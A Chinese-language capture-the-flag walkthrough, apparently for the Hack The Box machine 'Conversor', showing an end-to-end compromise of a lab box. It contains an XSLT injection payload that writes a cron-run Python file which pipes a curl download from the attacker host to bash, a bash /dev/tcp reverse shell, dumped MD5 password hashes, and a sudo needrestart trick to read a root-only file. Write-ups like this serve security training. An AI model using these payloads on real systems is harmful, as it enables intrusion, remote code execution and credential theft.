信息收集

┌──(root㉿kali)-[~]
└─# nmap -A -Pn 10.129.6.82
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-27 13:26 EST
Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.65% done; ETC: 13:27 (0:00:00 remaining)
Nmap scan report for 10.129.6.82 (10.129.6.82)
Host is up (0.66s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA)
|_  256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://conversor.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: Host: conversor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
​
TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   579.05 ms 10.10.16.1 (10.10.16.1)
2   273.23 ms 10.129.6.82 (10.129.6.82)
​
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.53 seconds
​

echo “10.129.6.82 conversor.htb” > /etc/hosts

┌──(root㉿kali)-[~]
└─# dirsearch -u http://conversor.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict
​
  _|. _ _  _  _  _ _|_    v0.4.3 
 (_||| _) (/_(_|| (_| )                                                                                     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
​
Output File: /root/reports/http_conversor.htb/__26-02-27_13-37-52.txt
​
Target: http://conversor.htb/
​
[13:37:52] Starting:                                                                     [13:38:39] 200 -    3KB - /about                                            
[13:40:15] 404 -  275B  - /javascript/tiny_mce                              
[13:40:15] 404 -  275B  - /javascript/editors/fckeditor
[13:40:15] 301 -  319B  - /javascript  ->  http://conversor.htb/javascript/ 
[13:40:21] 200 -  722B  - /login                                            
[13:40:59] 200 -  726B  - /register                                         
[13:41:07] 403 -  278B  - /server-status                                    
[13:41:07] 403 -  278B  - /server-status/     

Web

包含应用程序源代码可下载，简单审计

lxml 库，应用程序使用 cron 作业来清理文件：

If you want to run Python scripts (for example, our server deletes all files older than 60 minutes to avoid system overload), you can add the following line to your /etc/crontab: * * * * * www-data for f in /var/www/conversor.htb/scripts/*.py; do python3 "$f"; done

系统每分钟都会以 www-data 的形式执行 /var/www/conversor.htb/scripts/ 目录下的所有 .py 文件

所以我们可以写入py文件执行代码，应用程序解析 XML 并使用 XSLT 进行转换，利用XSLT注入

┌──(root㉿kali)-[/home/kali/Desktop]
└─# cat  XSLT.xsl 
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:exsl="http://exslt.org/common"
    extension-element-prefixes="exsl">
    
    <xsl:template match="/">
        <exsl:document href="file:///var/www/conversor.htb/scripts/shell.py" method="text">
import os
os.system("curl 10.10.16.35:8000/shell.sh|bash")
        </exsl:document>
        <xsl:text>Done</xsl:text>
    </xsl:template>
</xsl:stylesheet>
​

然后在主页上传，至于xml文件，任意上传即可，写好我们的反弹shell文件

bash -i >& /dev/tcp/10.10.16.35/2333 0>&1

然后我们攻击机上

python3 -m http.server 8000
nc -lvvp 2333

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvvp 2333
listening on [any] 2333 ...
connect to [10.10.16.35] from conversor.htb [10.129.6.82] 43624
bash: cannot set terminal process group (4665): Inappropriate ioctl for device
bash: no job control in this shell
www-data@conversor:~$ whoami
whoami
www-data
www-data@conversor:~$ ls
ls
conversor.htb

在conversor.htb里在有一个user.db文件，sqlite查看一下

┌──(root㉿kali)-[/home/kali/Desktop]
└─# wget http://10.129.6.82:8000/users.db                                                        
--2026-02-27 14:57:06--  http://10.129.6.82:8000/users.db
Connecting to 10.129.6.82:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24576 (24K) [application/octet-stream]
Saving to: ‘users.db’
​
users.db                                                                                                   100%[======================================================================================================================================================================================================================================================================================>]  24.00K  22.2KB/s    in 1.1s    
​
2026-02-27 14:57:07 (22.2 KB/s) - ‘users.db’ saved [24576/24576]

sqlite3 users.db
sqlite> .tables
files  users
sqlite> select  *  from  users
   ...> ;
1|fismathack|5b5c3ac3a1c897c94caad48e6c71fdec
5|1|c4ca4238a0b923820dcc509a6f75849b

测试发现是ssh密码

User

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ssh fismathack@conversor.htb                    
​
The authenticity of host 'conversor.htb (10.129.6.82)' can't be established.
ED25519 key fingerprint is SHA256:xCQV5IVWuIxtwatNjsFrwT7VS83ttIlDqpHrlnXiHR8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'conversor.htb' (ED25519) to the list of known hosts.
fismathack@conversor.htb's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-160-generic x86_64)
​
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
​
 System information as of Fri Feb 27 08:02:13 PM UTC 2026
​
  System load:  0.0               Processes:             220
  Usage of /:   65.0% of 5.78GB   Users logged in:       0
  Memory usage: 8%                IPv4 address for eth0: 10.129.6.82
  Swap usage:   0%
​
 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.
​
   https://ubuntu.com/engage/secure-kubernetes-at-the-edge
​
Expanded Security Maintenance for Applications is not enabled.
​
0 updates can be applied immediately.
​
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
​
​
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
​
​
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
​
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
​
Last login: Fri Feb 27 20:02:16 2026 from 10.10.16.35
fismathack@conversor:~$ ls
user.txt
fismathack@conversor:~$ cat user.txt

提权

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

先信息收集一下Linux提权方案，没找到什么有用的

/usr/sbin/needrestart直接读文件

fismathack@conversor:~$ sudo -l
Matching Defaults entries for fismathack on conversor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
​
User fismathack may run the following commands on conversor:
    (ALL : ALL) NOPASSWD: /usr/sbin/needrestart
fismathack@conversor:~$ sudo needrestart -c /root/root.txt
Bareword found where operator expected at (eval 14) line 1, near "8c5e1986d850cffcfb941c30f2f38cc1"
        (Missing operator before c5e1986d850cffcfb941c30f2f38cc1?)
Error parsing /root/root.txt: syntax error at (eval 14) line 2, near "8c5e1986d850cffcfb941c30f2f38cc1
​
"
fismathack@conversor:~$ Read from remote host conversor.htb: No route to host
Connection to conversor.htb closed.